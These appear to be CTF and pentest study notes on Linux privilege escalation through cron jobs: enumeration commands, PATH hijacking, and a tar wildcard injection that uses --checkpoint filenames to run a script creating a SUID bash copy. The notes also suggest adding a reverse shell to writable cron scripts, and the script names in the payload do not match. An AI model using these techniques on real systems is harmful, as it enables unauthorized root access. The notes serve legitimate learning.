Cron Jobs
{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs" %}
Cron jobs
{% embed url="https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs" %}
Read the cron jobs then read permissions on any scripts running
01cat /etc/crontab{% hint style="info" %} In CTF situations, if there are any custom scripts as cron jobs they're most likely there for a reason, especially ones running as root. {% endhint %}
Systemd timers could aslo be running which essentially do the same thing
01systemctl list-timers --allCron Paths
If the path of the script isn't a the full file path it will check the first path in the PATH variable for it first
Cron Wildcards
If we only have read permissions on a script but it is using a wildcard with another command, we can make that command run something malicious instead
With tar specifically we can make it run a script using touch and checkpoints
<pre><code>echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > privme.sh <strong>touch -- "--checkpoint=1" </strong>touch -- "--checkpoint-action=exec=sh privmeme.sh" </code></pre>Cron File Overwrites
Check the file permissions on the scheduled script and add a reverse shell to it